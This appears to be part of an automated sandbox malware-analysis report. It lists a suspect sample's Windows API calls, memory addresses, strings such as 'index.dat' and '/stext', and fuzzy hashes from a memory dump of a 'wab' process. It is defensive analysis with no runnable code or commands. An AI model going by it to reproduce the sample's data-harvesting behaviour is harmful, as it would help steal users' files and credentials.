                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1631957507-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1161345128-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 159017214-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                          • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                          • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                          • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1481295809-0
                                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
